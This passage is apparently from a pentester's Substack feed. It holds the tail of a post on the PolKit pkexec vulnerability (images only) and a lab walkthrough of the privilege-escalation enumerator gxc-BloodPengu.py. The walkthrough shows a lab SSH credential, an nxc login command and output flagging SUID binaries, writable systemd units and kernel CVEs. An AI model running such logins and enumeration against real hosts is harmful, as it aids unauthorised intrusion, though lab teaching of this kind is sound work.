data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6cbdda31-e1c0-462d-8b73-780d0fbe8fd1_1731x827.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:696,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:364401,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189852119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6cbdda31-e1c0-462d-8b73-780d0fbe8fd1_1731x827.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!OUw7!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6cbdda31-e1c0-462d-8b73-780d0fbe8fd1_1731x827.png 424w, https://substackcdn.com/image/fetch/$s_!OUw7!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6cbdda31-e1c0-462d-8b73-780d0fbe8fd1_1731x827.png 848w, https://substackcdn.com/image/fetch/$s_!OUw7!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6cbdda31-e1c0-462d-8b73-780d0fbe8fd1_1731x827.png 1272w, https://substackcdn.com/image/fetch/$s_!OUw7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6cbdda31-e1c0-462d-8b73-780d0fbe8fd1_1731x827.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!geVH!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffec6d1ce-e464-46ca-b369-32fe65a4b64a_1731x827.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!geVH!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffec6d1ce-e464-46ca-b369-32fe65a4b64a_1731x827.png 424w, https://substackcdn.com/image/fetch/$s_!geVH!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffec6d1ce-e464-46ca-b369-32fe65a4b64a_1731x827.png 848w, https://substackcdn.com/image/fetch/$s_!geVH!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffec6d1ce-e464-46ca-b369-32fe65a4b64a_1731x827.png 1272w, https://substackcdn.com/image/fetch/$s_!geVH!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffec6d1ce-e464-46ca-b369-32fe65a4b64a_1731x827.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!geVH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffec6d1ce-e464-46ca-b369-32fe65a4b64a_1731x827.png" width="1456" height="696" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fec6d1ce-e464-46ca-b369-32fe65a4b64a_1731x827.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:696,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:274222,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189852119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffec6d1ce-e464-46ca-b369-32fe65a4b64a_1731x827.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!geVH!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffec6d1ce-e464-46ca-b369-32fe65a4b64a_1731x827.png 424w, https://substackcdn.com/image/fetch/$s_!geVH!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffec6d1ce-e464-46ca-b369-32fe65a4b64a_1731x827.png 848w, https://substackcdn.com/image/fetch/$s_!geVH!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffec6d1ce-e464-46ca-b369-32fe65a4b64a_1731x827.png 1272w, https://substackcdn.com/image/fetch/$s_!geVH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffec6d1ce-e464-46ca-b369-32fe65a4b64a_1731x827.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>He we go, the PolKit PkExec vuln:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!rLQL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0565e44d-16a8-44c3-98df-048b65845b87_1731x827.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!rLQL!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0565e44d-16a8-44c3-98df-048b65845b87_1731x827.png 424w, https://substackcdn.com/image/fetch/$s_!rLQL!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0565e44d-16a8-44c3-98df-048b65845b87_1731x827.png 848w, https://substackcdn.com/image/fetch/$s_!rLQL!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0565e44d-16a8-44c3-98df-048b65845b87_1731x827.png 1272w, https://substackcdn.com/image/fetch/$s_!rLQL!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0565e44d-16a8-44c3-98df-048b65845b87_1731x827.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!rLQL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0565e44d-16a8-44c3-98df-048b65845b87_1731x827.png" width="1731" height="827" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0565e44d-16a8-44c3-98df-048b65845b87_1731x827.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:827,&quot;width&quot;:1731,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:234032,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189852119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F815ef6be-6aac-4ba3-95d5-665112f48bc3_1731x827.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!rLQL!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0565e44d-16a8-44c3-98df-048b65845b87_1731x827.png 424w, https://substackcdn.com/image/fetch/$s_!rLQL!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0565e44d-16a8-44c3-98df-048b65845b87_1731x827.png 848w, https://substackcdn.com/image/fetch/$s_!rLQL!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0565e44d-16a8-44c3-98df-048b65845b87_1731x827.png 1272w, https://substackcdn.com/image/fetch/$s_!rLQL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0565e44d-16a8-44c3-98df-048b65845b87_1731x827.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Happy hacking!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[BloodPengu and gxc-BloodPengu.py]]></title><description><![CDATA[Practical BloodPengu and it's Attack kit for making Linux Privilege Escalation much easier.]]></description><link>https://byt3n33dl3.substack.com/p/bloodpengu-and-gxc-bloodpengupy</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/bloodpengu-and-gxc-bloodpengupy</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Mon, 02 Mar 2026 04:14:21 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/9e1f589f-b9db-43b6-9de5-ebddc940f95a_937x661.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h4>Scenario:</h4><p>Me as Pentester already found pair credential for logon via SSH, this would help BloodPengu.py due to it&#8217;s needing SSH logon.</p><p>Credential:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: love
passwd: P@$$w0rd@123</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nxc ssh 192.168.221.211 -u love -p 'P@$$w0rd@123'
SSH         192.168.221.211 22     192.168.221.211  [*] SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
SSH         192.168.221.211 22     192.168.221.211  [+] love:P@$$w0rd@123  Linux - Shell access!</code></pre></div><p>Usage to when pentester use BloodPengu.py:</p><ul><li><p>Having SSH logon access.</p></li></ul><p>As now we already having logon access, let&#8217;s use BloodPengu.py:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(venv)&#9472;(root&#12927;kali)-[/]
&#9492;&#9472;# bloodpengu-python 192.168.221.211 -u love -p 'P@$$w0rd@123' -o out.json              

                                                                      
                /MM0MM                                                
                     hM       -w1MMMxXX                               
                           wMMMMMMMMMMM0hM                            
                     h  /0MMhMhhMMM0MMMhMMMh                          
                       M/h0hMMxM/1hhhM&gt;hhh^x/^                        
                    hhMhMX hhMh       0&gt;     ww                       
                  MM   M0Mh0 -w      -xhI    ^                        
                    --h-1/Mh&gt;h-      0w    -  x                       
                   -XXXw&gt;1h wwIhXww-hhh^   whwhh                      
                    X&gt;I^h1 Iw- 0hMhhhhhwhhhhh                         
                    ^MI0-1 ^^Xww hhX&gt; M1hwhMwh                        
                  I &gt;1 h^ &gt;/  hw0-I0MXMMxwhMhhx     Mh&gt; w             
                 11 hhhhh1  /II00 ^0xMX1^hwh hh          0/           
               x&gt;0-xh ^x/  Xx^w0   h1Mh0Ihwh X&gt;&gt;0      wwM/           
               1 -xw  X  w0hxh&gt;   h/hM-/&gt;hXh^   &gt;w&gt;XhwXwIX            
              1 w0h&gt;   w/-hhw xx- MMwhw^0w1  &gt;w  -I II                
              Ix 0hM x/w0 1h &gt; X Ihhhh h/0^ /hhh/w/x                  
              h w^-h&gt;wh^I hxM  hhMhhh  wh- Ix1 Mhxhhhhw               
                 0&gt;00/1X   hhhhhh1hh w0x1 -&gt;X/0&gt; w^ hIhhw&gt;            
           &gt;w0/ -   /     1I^Xww1 -X0&gt; - 1w00X1X  10 - wXXx           
           I00-        w00/  I  &gt;0xhX/ 1  0/1Ix0wIx    Iw/x           
            1 wwhhhhhh1h &gt; 11  00-hh^ x1    ^   w&gt;wXw 0X0I            
            w/w1--  ^^wI^ &gt;&gt;  wwhhh0 ^I -w / 0   X&gt;x -1  1^           
              X 0I1 0^x1^x0   0whwI  ^wx  x&gt;h ^   I   1x 1            
                        Xx    xwhwX  w//  11 X/0  11  1 &gt;I            
                       Ix/    h/h&gt;I  0    h&gt;-1I0   &gt;I&gt;&gt;               
                       &gt; x/ 0  /hw&gt;&gt; ^XX0w- X&gt;h^                      
                            -  -whxwww10^-hw/^0                       
                                ^--^  -^0w/&gt;ww                        
                                 Iw-xh &gt;I-                            
                                     w                                

                           v1.3.9 [Kraken Husk]                          

  gxc-BloodPengu.py v1.3.9 | by &lt;@byt3n33dl3&gt;
  Data collector in Python for BloodPengu APM

  ----------------------------------------------------------------------

  [*]  Target  : 192.168.221.211:22
  [*]  User    : love
  [*]  Auth    : password
  [*]  Mode    : full collection
  [*]  Output  : out.json

  [*]  Connecting to 192.168.221.211:22...
  [+]  Connected in 0.30s  -  love@192.168.221.211:22
  [+]  Remote  : Linux election 5.4.0-120-generic #136~18.04.1-Ubuntu SMP Fri Jun 10 18:00:44 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

  ----------------------------------------------------------------------

  [*]  Collecting users and groups...
  [+]  Users: 45  |  Groups: 70
  [*]  Collecting sudo rules...
  [-]  sudo -l returned nothing - no sudo access or not in sudoers
  [*]  Collecting SUID/SGID binaries...
  [CRITICAL]  suid            GTFOBins SUID binary: /bin/umount
  [CRITICAL]  suid            GTFOBins SUID binary: /bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core/7917/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core/7917/bin/umount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core/7270/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core/7270/bin/umount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1066/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1066/bin/umount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1223/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1223/bin/umount
  [+]  SUID/SGID: 119  |  GTFOBins hits: 10
  [*]  Collecting privileged group memberships...
  [POTENTIAL]  groups          Member of adm - log access, possible credential leakage
  [+]  Groups: adm, cdrom, dip, love, lpadmin, plugdev, sambashare, www-data
  [*]  Collecting systemd service units...
  [CRITICAL]  services        Writable systemd unit: /etc/systemd/system/snapd.service
  [CRITICAL]  services        Writable systemd unit: /etc/systemd/system/snapd.system-shutdown.service
  [CRITICAL]  services        Writable systemd unit: /etc/systemd/system/snapd.core-fixup.service
  [CRITICAL]  services        Writable systemd unit: /etc/systemd/system/snapd.autoimport.service
  [CRITICAL]  services        Writable systemd unit: /etc/systemd/system/snapd.seeded.service
  [CRITICAL]  services        Writable systemd unit: /etc/systemd/system/apparmor.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/mountnfs-bootclean.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/bootmisc.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/hwclock.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/mountkernfs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/cryptdisks-early.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/saned.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/x11-common.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/mountall.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/checkfs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/reboot.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/killprocs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/rc.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/fuse.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/checkroot.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/halt.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/umountfs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/checkroot-bootclean.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/mountall-bootclean.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/hostname.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/rmnologin.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/mountnfs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/motd.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/umountroot.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/single.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/sendsigs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/bootlogs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/umountnfs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/stop-bootlogd-single.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/stop-bootlogd.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/mountdevsubfs.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/alsa-utils.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/sudo.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/rcS.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/bootlogd.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/cryptdisks.service
  [+]  Units scanned: 366  |  Writable: 41
  [*]  Collecting cron jobs and scheduled tasks...
  [+]  Cron entries collected: 1
  [*]  Collecting kernel information...
  [HIGH    ]  kernel          Kernel 5.4.0-120-generic may be vulnerable to CVE-2021-4034
  [HIGH    ]  kernel          Kernel 5.4.0-120-generic may be vulnerable to CVE-2021-3156
  [HIGH    ]  kernel          Kernel 5.4.0-120-generic may be vulnerable to CVE-2022-0847
  [+]  Kernel: 5.4.0-120-generic  |  CVE matches: 3
  [*]  Collecting container and cloud context...
  [+]  Docker socket: False  |  In container: False
  [*]  Collecting network information...
  [POTENTIAL]  network         Interesting internal service: mysql (port 3306): tcp    LISTEN   0        80              127.0.0.1:3306           0.0.0.0:*
  [+]  Interfaces: 1  |  Interesting services: 1
  [*]  Collecting environment and interesting files...
  [CRITICAL]  env             CTF flag file: /home/love/Desktop/user.txt
  [HIGH    ]  env             Sensitive commands in history: /home/love/.bash_history
  [+]  Env collected  |  Interesting files: 16
  [*]  Running SACSPengu module - compiler and binary analysis...
  [POTENTIAL]  sacspengu       Compiler/interpreter: gcc -&gt; /usr/bin/gcc
  [POTENTIAL]  sacspengu       Compiler/interpreter: cc -&gt; /usr/bin/cc
  [POTENTIAL]  sacspengu       Compiler/interpreter: c89 -&gt; /usr/bin/c89
  [POTENTIAL]  sacspengu       Compiler/interpreter: c99 -&gt; /usr/bin/c99
  [POTENTIAL]  sacspengu       Compiler/interpreter: make -&gt; /usr/bin/make
  [POTENTIAL]  sacspengu       Compiler/interpreter: python -&gt; /usr/bin/python
  [POTENTIAL]  sacspengu       Compiler/interpreter: python3 -&gt; /usr/bin/python3
  [POTENTIAL]  sacspengu       Compiler/interpreter: python2 -&gt; /usr/bin/python2
  [POTENTIAL]  sacspengu       Compiler/interpreter: perl -&gt; /usr/bin/perl
  [POTENTIAL]  sacspengu       Compiler/interpreter: php -&gt; /usr/bin/php
  [POTENTIAL]  sacspengu       Compiler/interpreter: as -&gt; /usr/bin/as
  [POTENTIAL]  sacspengu       Compiler/interpreter: ld -&gt; /usr/bin/ld
  [POTENTIAL]  sacspengu       Compiler/interpreter: ar -&gt; /usr/bin/ar
  [POTENTIAL]  sacspengu       Compiler/interpreter: nm -&gt; /usr/bin/nm
  [POTENTIAL]  sacspengu       Compiler/interpreter: objdump -&gt; /usr/bin/objdump
  [POTENTIAL]  sacspengu       Compiler/interpreter: strip -&gt; /usr/bin/strip
  [POTENTIAL]  sacspengu       Compiler/interpreter: readelf -&gt; /usr/bin/readelf
  [CRITICAL]  sacspengu       Dangerous capability: /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
  [+]  Compilers: 17  |  Writable PATH dirs: 0  |  Capabilities scanned

  ----------------------------------------------------------------------

  [+]  Collection complete in 88.01s

  [CRITICAL ]  53
  [HIGH     ]  4
  [POTENTIAL]  19

  [~]  Total findings  :  76
  [~]  Graph nodes     :  523
  [~]  Graph edges     :  228
  [~]  Output file     :  out.json

  [+]  Import out.json into BloodPengu via Import JSON

  ----------------------------------------------------------------------

  gxc-BloodPengu.py v1.3.9 by &lt;@byt3n33dl3&gt; &lt;github.com/byt3n33dl3/gxc-BloodPengu.py&gt;</code></pre></div><p>Dope, we got the JSON file to digest in BloodPengu, PS: this is BloodPengu.py version 1.3.9 &#8220;Kraken Husk&#8220;, changes might be added in future!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!CWKD!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74ecc805-d309-4b2f-8bdd-21ca09650d76_1651x796.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!CWKD!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74ecc805-d309-4b2f-8bdd-21ca09650d76_1651x796.png 424w, https://substackcdn.com/image/fetch/$s_!CWKD!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74ecc805-d309-4b2f-8bdd-21ca09650d76_1651x796.png 848w, https://substackcdn.com/image/fetch/$s_!CWKD!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74ecc805-d309-4b2f-8bdd-21ca09650d76_1651x796.png 1272w, https://substackcdn.com/image/fetch/$s_!CWKD!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74ecc805-d309-4b2f-8bdd-21ca09650d76_1651x796.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!CWKD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74ecc805-d309-4b2f-8bdd-21ca09650d76_1651x796.png" width="1456" height="702" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/74ecc805-d309-4b2f-8bdd-21ca09650d76_1651x796.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:702,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:152561,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189616325?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74ecc805-d309-4b2f-8bdd-21ca09650d76_1651x796.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" 